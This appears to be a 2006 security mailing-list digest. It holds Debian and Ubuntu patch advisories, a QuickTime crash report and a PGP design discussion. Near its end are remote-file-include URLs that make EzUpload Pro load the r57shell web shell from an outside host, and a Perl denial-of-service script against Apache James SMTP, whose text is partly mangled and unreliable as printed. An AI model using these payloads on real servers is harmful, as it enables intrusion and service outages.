[SECURITY] [DSA 1079-1] New MySQL 4.0 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1079-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze May 29th, 2006 http://www.debian.org/security/faq - -- Package: mysql-dfsg Vulnerability : several Problem type : remote Debian-specific: no CVE IDs: CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518 CERT advisory : VU#602457 BugTraq IDs: 16850 17780 Debian Bugs: 366044 366049 366163 Several vulnerabilities have been discovered in MySQL, a popular SQL database. The Common Vulnerabilities and Exposures Project identifies the following problems: CVE-2006-0903 Improper handling of SQL queries containing the NULL character allow local users to bypass logging mechanisms. CVE-2006-1516 Usernames without a trailing null byte allow remote attackers to read portions of memory. CVE-2006-1517 A request with an incorrect packet length allows remote attackers to obtain sensitive information. CVE-2006-1518 Specially crafted request packets with invalid length values allow the execution of arbitrary code. The following vulnerability matrix shows which version of MySQL in which distribution has this problem fixed: woodysargesid mysql3.23.49-8.15n/a n/a mysql-dfsg n/a 4.0.24-10sarge2 n/a mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a mysql-dfsg-5.0 n/a n/a 5.0.21-3 We recommend that you upgrade your mysql packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10sarge2.dsc Size/MD5 checksum: 966 42f14bb83f832f0f88bdabb317f62df8 http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10sarge2.diff.gz Size/MD5 checksum:98938 9aaf7d794c14faa63a05d7630f683383 http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-dfsg_4.0.24.orig.tar.gz Size/MD5 checksum: 9923794 aed8f335795a359f32492159e3edfaa3 Architecture independent components: http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-common_4.0.24-10sarge2_all.deb Size/MD5 checksum:34566 f4aa726f5f9ec79e42799a40faabcf17 Alpha architecture: http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_alpha.deb Size/MD5 checksum: 356730 97904c2a773bc61c643e4dce283a2862 http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_alpha.deb Size/MD5 checksum: 4533478 8edafbc553d062864c4bb17cbca3211b http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_alpha.deb Size/MD5 checksum: 520712 5883aef348e2eb1321b21051cdd604be http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_alpha.deb Size/MD5 checksum: 4890620 824e4c4c078ef73612fccbea7e209651 AMD64 architecture: http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_amd64.deb Size/MD5 checksum: 309490 c7943142f1f618987c87073c5893174e http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_amd64.deb Size/MD5 checksum: 3182676 e62cc19620500c5430447978b7e645c6 http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_amd64.deb Size/MD5 checksum: 434022 55e3f43e8ac136951fc1b679df820cd1 http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_amd64.deb Size/MD5 checksum: 3878414 5ab561357abca1720b9942c9f8e78a4e ARM architecture: http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_arm.deb Size/MD5 checksum: 288180 6869739c00a8151a181ec8cfffe1ec70 http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_arm.deb Size/MD5 checksum: 2848430 945158edc0fba528a04f98170fe55921 http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_arm.deb Size/MD5 checksum: 414176
[SECURITY] [DSA 1080-1] New dovecot packages fix directory traversal
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1080-1[EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp May 29th, 2006 http://www.debian.org/security/faq - -- Package: dovecot Vulnerability : programming error Problem type : remote Debian-specific: no CVE ID : CVE-2006-2414 A problem has been discovered in the IMAP component of Dovecot, a secure mail server that supports mbox and maildir mailboxes, which can lead to information disclosure via directory traversal by authenticated users. The old stable distribution (woody) is not affected by this problem. For the stable distribution (sarge) this problem has been fixed in version 0.99.14-1sarge0. For the unstable distribution (sid) this problem has been fixed in version 1.0beta8-1. We recommend that you upgrade your dovecot-imapd package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/d/dovecot/dovecot_0.99.14-1sarge0.dsc Size/MD5 checksum: 760 5365f712ee15d1c3b825af2ef95f583e http://security.debian.org/pool/updates/main/d/dovecot/dovecot_0.99.14-1sarge0.diff.gz Size/MD5 checksum:26557 e30859421db7ebe8478dacb02110f3f0 http://security.debian.org/pool/updates/main/d/dovecot/dovecot_0.99.14.orig.tar.gz Size/MD5 checksum: 871285 a12e26fd378a46c31ec3a81ab7b55b5b Architecture independent components: http://security.debian.org/pool/updates/main/d/dovecot/dovecot_0.99.14-1sarge0_all.deb Size/MD5 checksum: 7516 b6813e75e60e5094ac114fcc198d2ea2 Alpha architecture: http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_0.99.14-1sarge0_alpha.deb Size/MD5 checksum: 283796 06751f47fe61b4f9fd410cd055288be2 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_0.99.14-1sarge0_alpha.deb Size/MD5 checksum: 364838 e6e564cf60e92b4bd12f5209f56ed4c1 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_0.99.14-1sarge0_alpha.deb Size/MD5 checksum: 331290 e6bf35a49d23636b53378e996ce9c1d2 AMD64 architecture: http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_0.99.14-1sarge0_amd64.deb Size/MD5 checksum: 258846 990b811364af83c3223e6a733fb6856b http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_0.99.14-1sarge0_amd64.deb Size/MD5 checksum: 311520 642e17490997baa93857b282c4b13f7a http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_0.99.14-1sarge0_amd64.deb Size/MD5 checksum: 285308 6ea57ba9b419b77964812a93f959b98c ARM architecture: http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_0.99.14-1sarge0_arm.deb Size/MD5 checksum: 244796 64574178089a5c8ee75912adbe0aaf33 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_0.99.14-1sarge0_arm.deb Size/MD5 checksum: 289624 5d4b172a52f4f23d9702348d03b35ff3 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_0.99.14-1sarge0_arm.deb Size/MD5 checksum: 265496 3284fc52fd054f5545e8327cc0d39e7a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_0.99.14-1sarge0_i386.deb Size/MD5 checksum: 245230 ba2e1bccd3d12180c2ec50d41102dde7 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_0.99.14-1sarge0_i386.deb Size/MD5 checksum: 292656 00c0245e231a07bc05104c2b3113951b http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_0.99.14-1sarge0_i386.deb Size/MD5 checksum: 268158 9c061cc01ca82178530b6c47aad1120c Intel IA-64 architecture: http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_0.99.14-1sarge0_ia64.deb Size/MD5 checksum: 308824 fab290d2d317aa96a029214cf05e http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_0.99.14-1sarge0_ia64.deb Size/MD5 checksum: 429626 287f26ebef5de68a0867ef38fcba4aa0 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_0.99.14-1sarge0_ia64.deb Size/MD5 checksum: 389276 f4cc53876bae4f3780eeb89465700c8f HP Precision architecture:
[SECURITY] [DSA 1081-1] New libextractor packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1081-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze May 29th, 2006 http://www.debian.org/security/faq - -- Package: libextractor Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE ID : CVE-2006-2458 BugTraq ID : 18021 Luigi Auriemma discovered a buffer overflow in the processing of ASF files in libextractor, a library to extract arbitrary meta-data from files., which can lead to the execution of arbitrary code. The old stable distribution (woody) is not affected by this problem. For the stable distribution (sarge) this problem has been fixed in version 0.4.2-2sarge5. For the unstable distribution (sid) this problem has been fixed in version 0.5.14-1. We recommend that you upgrade your libextractor packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/libe/libextractor/libextractor_0.4.2-2sarge5.dsc Size/MD5 checksum: 778 c3215a74f69c129ed235db8b5fe178e6 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor_0.4.2-2sarge5.diff.gz Size/MD5 checksum: 7079 d2037e9f74bef85bf4a73f852ddfafad http://security.debian.org/pool/updates/main/libe/libextractor/libextractor_0.4.2.orig.tar.gz Size/MD5 checksum: 5887095 d99e1b13a017d39700e376a0edbf7ba2 Alpha architecture: http://security.debian.org/pool/updates/main/libe/libextractor/extract_0.4.2-2sarge5_alpha.deb Size/MD5 checksum:19598 815bb87bcc9d5e143513c8adff67b338 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1_0.4.2-2sarge5_alpha.deb Size/MD5 checksum: 5804952 22c415c2aee20ed8007a2d0662bebad6 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1-dev_0.4.2-2sarge5_alpha.deb Size/MD5 checksum:19384 2f3a45d22e6a52721ed57543f199313f AMD64 architecture: http://security.debian.org/pool/updates/main/libe/libextractor/extract_0.4.2-2sarge5_amd64.deb Size/MD5 checksum:18270 1a47010ad219b069f264a8024fd72aed http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1_0.4.2-2sarge5_amd64.deb Size/MD5 checksum: 5641542 efb4ac008ec794d8d17d1eb214ad3542 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1-dev_0.4.2-2sarge5_amd64.deb Size/MD5 checksum:17548 d6763b38aca5065486aa3c45f49dd2e0 ARM architecture: http://security.debian.org/pool/updates/main/libe/libextractor/extract_0.4.2-2sarge5_arm.deb Size/MD5 checksum:17648 7e52bda1ca202ea165cf305092d063f7 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1_0.4.2-2sarge5_arm.deb Size/MD5 checksum: 5710838 71d5589d4a0c3815a0b24474fb44af68 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1-dev_0.4.2-2sarge5_arm.deb Size/MD5 checksum:16964 0bc00d8fa937e1958c4db72f01566732 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/libe/libextractor/extract_0.4.2-2sarge5_i386.deb Size/MD5 checksum:17788 09bb0f12aa606fb48b7574305ccd8abc http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1_0.4.2-2sarge5_i386.deb Size/MD5 checksum: 5713332 234c03f92ed071fdc69844e04523514c http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1-dev_0.4.2-2sarge5_i386.deb Size/MD5 checksum:16706 5c5744dc49991cf0789a33f8a43557e1 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/libe/libextractor/extract_0.4.2-2sarge5_ia64.deb Size/MD5 checksum:20578 ade1344228270f2a2faede7e2507913c http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1_0.4.2-2sarge5_ia64.deb Size/MD5 checksum: 5905588 d1d4a949aecc95d5a3715a5e1bcc4b70 http://security.debian.org/pool/updates/main/libe/libextractor/libextractor1-dev_0.4.2-2sarge5_ia64.deb Size/MD5 checksum:19328 6aa6ab7c949e0dd8771b8961f97fbe4b HP Precision architecture:
[USN-287-1] Nagios vulnerability
=== Ubuntu Security Notice USN-287-1 May 29, 2006 nagios vulnerability CVE-2006-2489 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: nagios-common The problem can be corrected by upgrading the affected package to version 2:1.3-0+pre6ubuntu0.2 (for Ubuntu 5.04), or 2:1.3-cvs.20050402-4ubuntu3.2 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: The nagios CGI scripts did not sufficiently check the validity of the HTTP Content-Length attribute. By sending a specially crafted HTTP request with an invalidly large Content-Length value to the Nagios server, a remote attacker could exploit this to execute arbitrary code with web server privileges. Please note that the Apache 2 web server already checks for valid Content-Length values, so installations using Apache 2 (the only web server officially supported in Ubuntu) are not vulnerable to this flaw. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-0+pre6ubuntu0.2.diff.gz Size/MD5:80449 1af54c94d8119c7838dd5daed1e50c9b http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-0+pre6ubuntu0.2.dsc Size/MD5: 1010 7ce12d54ea17c24c898346995397e069 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3.orig.tar.gz Size/MD5: 1625322 414d70e5269d5b8d7c21bf3ee129309f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-common_1.3-0+pre6ubuntu0.2_all.deb Size/MD5: 1213320 bb517ad62a0b4515b677fffa556086f9 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-0+pre6ubuntu0.2_amd64.deb Size/MD5: 994506 a5115aa68e435a3727f066addedb20c7 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-0+pre6ubuntu0.2_amd64.deb Size/MD5: 1006602 29d2add2204db681b02c6345bb23c8ee http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-0+pre6ubuntu0.2_amd64.deb Size/MD5: 976218 026ea6069f7e240c501e40cc45d995a4 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-0+pre6ubuntu0.2_i386.deb Size/MD5: 872622 88340a6009fa9ca6e19d1d83967d47d0 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-0+pre6ubuntu0.2_i386.deb Size/MD5: 882350 26502350bfee23fbf3bba4297d4f73c1 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-0+pre6ubuntu0.2_i386.deb Size/MD5: 857930 f8f30305908113a31559f24d11d6d36d powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-0+pre6ubuntu0.2_powerpc.deb Size/MD5: 1003054 5710e195a858bd6e425e302dc1e8268b http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-0+pre6ubuntu0.2_powerpc.deb Size/MD5: 1010828 585a23296ea4a6e29141fa6cc8c6c39e http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-0+pre6ubuntu0.2_powerpc.deb Size/MD5: 970178 bcf95bae9783327b461f6c06dcfd6edb Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-4ubuntu3.2.diff.gz Size/MD5:73095 6415cb60826aacb697b6d5e8e2ce2987 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-4ubuntu3.2.dsc Size/MD5: 1039 40c86a1a990d82fa0c5608ad6d73c0d5 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402.orig.tar.gz Size/MD5: 1621251 0f92b7b8e705411b7881d3650cbb5d56 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-common_1.3-cvs.20050402-4ubuntu3.2_all.deb Size/MD5: 1221338 8242fbb490a4f669f3f06eddb2b6439e amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-4ubuntu3.2_amd64.deb Size/MD5: 1030086 4833dee00a8e7dd04469fcda70184cf6 http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-4ubuntu3.2_amd64.deb Size/MD5: 1041982 bfe2bee8ee08e6e45cce8bf905736e3b http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-4ubuntu3.2_amd64.deb Size/MD5: 1025714 c3f7679dd7e03cc7ef91178bb8943af1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-4ubuntu3.2_i386.deb Size/MD5: 879066 4c9e26642676ae206c90cd68b44ec538
[USN-288-1] PostgreSQL server/client vulnerabilities
=== Ubuntu Security Notice USN-288-1 May 29, 2006 postgresql-7.4/-8.0, postgresql, psycopg, python-pgsql vulnerabilities CVE-2006-2313, CVE-2006-2314 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: libpq3 libpq4 postgresql postgresql-7.4 postgresql-8.0 postgresql-client postgresql-client-7.4 postgresql-client-8.0 postgresql-contrib postgresql-contrib-7.4 postgresql-contrib-8.0 python2.3-pgsql python2.3-psycopg python2.4-pgsql python2.4-psycopg The problem can be corrected by upgrading the affected packages to the following versions: Ubuntu 5.04: postgresql: 7.4.7-2ubuntu2.3 postgresql-client:7.4.7-2ubuntu2.3 postgresql-contrib: 7.4.7-2ubuntu2.3 libpq3: 7.4.7-2ubuntu2.3 python2.3-pgsql: 2.4.0-5ubuntu2.1 python2.4-pgsql: 2.4.0-5ubuntu2.1 python2.3-psycopg:1.1.18-1ubuntu5.1 python2.4-psycopg:1.1.18-1ubuntu5.1 Ubuntu 5.10: postgresql-7.4: 1:7.4.8-17ubuntu1.3 postgresql-client-7.4:1:7.4.8-17ubuntu1.3 postgresql-contrib-7.4: 1:7.4.8-17ubuntu1.3 libpq3: 1:7.4.8-17ubuntu1.3 postgresql-8.0: 8.0.3-15ubuntu2.2 postgresql-client-8.0:8.0.3-15ubuntu2.2 postgresql-contrib-8.0: 8.0.3-15ubuntu2.2 libpq4: 8.0.3-15ubuntu2.2 python2.3-pgsql: 2.4.0-6ubuntu1.1 python2.4-pgsql: 2.4.0-6ubuntu1.1 python2.3-psycopg:1.1.18-1ubuntu6.1 python2.4-psycopg:1.1.18-1ubuntu6.1 In general, a standard system upgrade is sufficient to effect the necessary changes. However, if you run third party applications that use PostgreSQL, you might need further fixes, please see the details below. Details follow: CVE-2006-2313: Akio Ishida and Yasuo Ohgaki discovered a weakness in the handling of invalidly-encoded multibyte text data. If a client application processed untrusted input without respecting its encoding and applied standard string escaping techniques (such as replacing a single quote ' with \' or ''), the PostgreSQL server could interpret the resulting string in a way that allowed an attacker to inject arbitrary SQL commands into the resulting SQL query. The PostgreSQL server has been modified to reject such invalidly encoded strings now, which completely fixes the problem for some 'safe' multibyte encodings like UTF-8. CVE-2006-2314: However, there are some less popular and client-only multibyte encodings (such as SJIS, BIG5, GBK, GB18030, and UHC) which contain valid multibyte characters that end with the byte 0x5c, which is the representation of the backslash character \ in ASCII. Many client libraries and applications use the non-standard, but popular way of escaping the ' character by replacing all occurences of it with \'. If a client application uses one of the affected encodings and does not interpret multibyte characters, and an attacker supplies a specially crafted byte sequence as an input string parameter, this escaping method would then produce a validly-encoded character and an excess ' character which would end the string. All subsequent characters would then be interpreted as SQL code, so the attacker could execute arbitrary SQL commands. To fix this vulnerability end-to-end, client-side applications must be fixed to properly interpret multibyte encodings and use '' instead of \'. However, as a precautionary measure, the sequence \' is now regarded as invalid when one of the affected client encodings is in use. If you depend on the previous behaviour, you can restore it by setting 'backslash_quote = on' in postgresql.conf. However, please be aware that this could render you vulnerable again. This issue does not affect you if you only use single-byte (like SQL_ASCII or the ISO-8859-X family) or unaffected multibyte (like UTF-8) encodings. Please see http://www.postgresql.org/docs/techdocs.50 for further details. The psycopg and python-pgsql packages have been updated to consistently use '' for escaping quotes in strings. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql/postgresql_7.4.7-2ubuntu2.3.diff.gz Size/MD5: 183390 00a207793ad3192c07af0e65f31081d7 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql/postgresql_7.4.7-2ubuntu2.3.dsc Size/MD5: 991 35313f32d6fcb5b9afa827315ad3eab9 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql/postgresql_7.4.7.orig.tar.gz Size/MD5: 9952102 d193c58aef02a745e8657c48038587ac http://security.ubuntu.com/ubuntu/pool/main/p/psycopg/psycopg_1.1.18-1ubuntu5.1.diff.gz Size/MD5: 4140 44436d40ca53aad223964bf5df5de140
Buffer overflow in QuickTime 7.0.4?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I'm not sure if this one is known but I see the last buffer overflows show Quicktime 7.x vulnerable and suggest upgrading to 7.0.4*. * http://docs.info.apple.com/article.html?artnum=303101 I was downloading Elephant's dream from http://osaddict.com/files/Elephants_Dream_1024-h264-st-aac.mov on Windows XP*, and started playing with scrolling past the end of the movie. This invariably crashes Firefox with the QuickTime player, etc etc. * http://orange.blender.org/ QuickTime, H.264 / AAC Stereo 1024x576 So I opened the QuickTime Player itself, v7.0.4, and threw it forward to half-way. I get a dialog box claiming the Microsoft Visual C Runtime detected a buffer overflow, and immediately remember-- windows has stack smash protection now, thanks to the MS Research Glepnir project looking into StackGuard! I know the basic concept-- canaries on the stack. So apparently I threw QuickTime 7.0.4 into an overflow again? The question here is, can anyone else reproduce this one? I don't have an exact environment or a file for you (it was downloading while it was going), but just let the download go for a bit and start trying to open it in QuickTime while it's downloading and scroll past the end. - -- All content of all messages exchanged herein are left in the Public Domain, unless otherwise explicitly stated. Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there. -- Eric Steven Raymond We will enslave their women, eat their children and rape their cattle! -- Bosc, Evil alien overlord from the fifth dimension -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBRHiwCgs1xW0HCTEFAQLdjhAAjh+dcm6CWIpUBLewzQeYf3p+56UmAFAH Q8O2WwXmU/E9HM5O4jz2cYbSYOLiWnGu32Oqf2qPFhiWh9XF/k7pNd4c+uEMUKaL 0+zMgyXZL8hsVqY90vKqWuFU1r20rbqfanrnZMbrdGP5ApeVbgTtYoJMfnIoy0ow QqAHAwdtLpVYcFL1FJ/iM8smGYBI8B3pmMd/rmYTeY1bKmho5+3Ei0WQjDicZ2At aNR6Nlzk/tv3vOJQxMxfXnRwlE1dfPGtWuzkSQK8EFwjEwWJSfkiRD68/PCUaowY 1ziqL3PMUaUVDJc3Cj9sNdpeUTErOfgcsHc06OjxKundp52nznZIG8zGVnPmdAwj OptiIrCTxkTIhzQA5ZVeBVk0uKb9aSIJWq4oaYemvvsjoM+teVVu4oeGTdepodHA w9KdKiuUbAmdQRlcXiFk8XvnFbatxs4sKPtnUjVx8Ti+LST6b0G6HjIvOr6hTGz6 bJbm2ln5tozRXsZhThEKIYuB4h/psrREoHTs5ft5cwJG2w3HoeGJL68xkXARfZLc 3K5czeY0AZ/g6q7YF3XdjTraA8a/aM0pChAwximQJPdKerhSaKKYKQI1rf3ajwXY +I4O2//KDXWFZzgRNNEc2jjDGyo8e0eXz9xfmwPfwRq1KENwToUEOx4CH/EDIDZI aYKIDtHGFZk= =aJp3 -END PGP SIGNATURE-
Re: On the Recent PGP and Truecrypt Posting
On 27 May 2006, at 12:01 PM, John Pettitt wrote: I think the underlying point is that many users, not understanding the difference between the bulk key used to encrypt the data and the passphrase used to protect that bulk key would assume, incorrectly that changing the passphrase would lock out prior users. Clearly a users with a backup copy of an encrypted disk for which they know the passphrase can use the technique described to decode a more recent image of the same encrypted disk even though the owner of the disk may think it safe because the passphrase was changed. In this situation the old user gain access to newer data that they were not supposed to be able to access.This is different from the described restored backup situation in that the user is using a partial restore to circumvent a security mechanism. The re-encyrpt button obviously defeats this attack however it's not clear that real world users actually understand the need to re-encrypt to make pass phrase changes meaningful when backup copies exist. I think this is mostly a documentation issue and perhaps a user interface design issue in that users should be strongly advised to re-encrypt when they change the passphrase. You bring up an excellent point. As I said in my previous post, we are considering a change to the way we're doing things. Unfortunately, there's no one thing that's clear the the right thing to do. Let me examine some of them. We could make a documentation change. I don't like documentation changes like this because it's a cover-your-ass solution. Let's face it, no one reads the documentation. If we put in something there, we can answer any further objection with saying this is a documented situation, but it doesn't *solve* anything. It is in my opinion, a cop out. We're better off doing nothing or making a code change. Now then, we could make a code change. But what code change? Security is a strange business, because you quickly go from things that a absolute dos and don'ts into things upon which gentlepersons can disagree. Part of this is because doing the right thing for the user is a good design principle, but so is less is more. Simplicity makes for better security, and that means doing less. We could put a dialog box up warning the user. This is a reasonable thing to do. The Truecrypt folks do that. One can argue on the other side that is is just one step forward from a documentation change, that it is a CYA move that doesn't really solve the problem, it just allows you to wash your hands of the situation. I have to think about it for a while. I can see both sides of it. I lean towards less is more, particularly because there are lots of moving parts here. My main PGP disk is not passphase-based, it is public-key-based. If I change the passphrase on my key, does that mean that the PGP program should grovel over my disk looking for virtual disk volumes that are encrypted to that public key? If not, why not? Extend this to virtual volumes that are managed by a smart card or security token, and you can see it gets very hard very quickly. Automatically re-encrypting the disk has much peril to it. Any time you re-encrypt the disk, you expose the user to the chance of the complete loss of their data. If you want to make it safer, you make it slower. If you want to make it faster, you chew up more resources on the user's computer It's a relatively easy task when it's a megabyte. What happens when it's a hundred gigabytes? Right now, we not only do virtual disks, but also whole disk encryption. The core of what we do is the same across the board (if not exactly the same code). We have to make tradeoffs. You will also also see the architecture extend to some *very* cool storage encryption very soon. The re-encryption problem is something we take very seriously, and we have seriously discussed whether we should have a re-encryption daemon that runs in the background and works like a garbage collector, re-encrypting objects that need re- encrypting, based on some security policy describing when things will need to be re-encrypted. It is a garbage collector, but one that is tied to a two-phase-commit, zero loss database update system. Is that cool, or is it frightening? Or both? The CYA answer of putting a note in the manual can start looking attractive when you seriously start designing one of these. I'm open to discussion about the larger issues. But let us not forget that this started out with a bug report that itself says to first get a brain. It was high-handed and insulting. You're right, there is in the core of this, there is a very complex issue. We're discussing if we should do something in response to the real issue here. But the base issue, that there is some flaw in PGP and Truecrypt and other software that only an idiot could have let out is flat out false. Jon -- Jon
multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?cmd=pwd customize.php http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?cmd=pwd initialize.php http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?cmd=pwd path to admin login: ### emails: [EMAIL PROTECTED][EMAIL PROTECTED] ### All my respect to our friends , lezr.com , g123g.net done .. peace
JAMES 2.2.0 -- Denial Of Service
--- [ECHO_ADV_31$2006] JAMES 2.2.0 -- Denial Of Service --- Author : y3dips a.k.a Ahmad Muammar W.K Date : April, 27th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt --- Affected software description: ~~ Application : Java Apache Mail Enterprise Server (a.k.a. Apache James) version : 2.2.0 URL : http://jakarta.apache.org/avalon/phoenix Description : The Java Apache Mail Enterprise Server (a.k.a. Apache James) is a 100% pure Java SMTP and POP3 Mail server and NNTP News server. James also designed to be a complete and portable enterprise mail engine solution based on currently available open protocols. James is based upon the Apache Avalon application framework. (For more information about Avalon, please go to http://avalon.apache.org/) James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3). Vulnerability: ~~ James SMTP servers are allowing attacker to supply a long variable at SMTP argument (such as MAIL) to the SMTP server, because of this vulnerability the Processor at server machine will have a workload till 100% Exploit Code: ~ -- james.pl- #!/usr/bin/perl -w use IO::Socket; print * DOS buat JAMES ver.2.2.0 by y3dips *\n; if(@ARGV == 1) { my $host = $ARGV[0]; my $i = 1; $socket = IO::Socket::INET-new(Proto=tcp, PeerAddr=$host, PeerPort=25, Reuse=1) or die Cannot Connect to Server !; while ( $i++ ) { print $socket MAIL FROM: . fvclz x 100 . \r\n and print -- sucking CPU resources at $host .\n; sleep(1); } close $socket; } else { print Usage: $0 [target] \r\n\n; } --- Shoutz: ~~~ ~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous 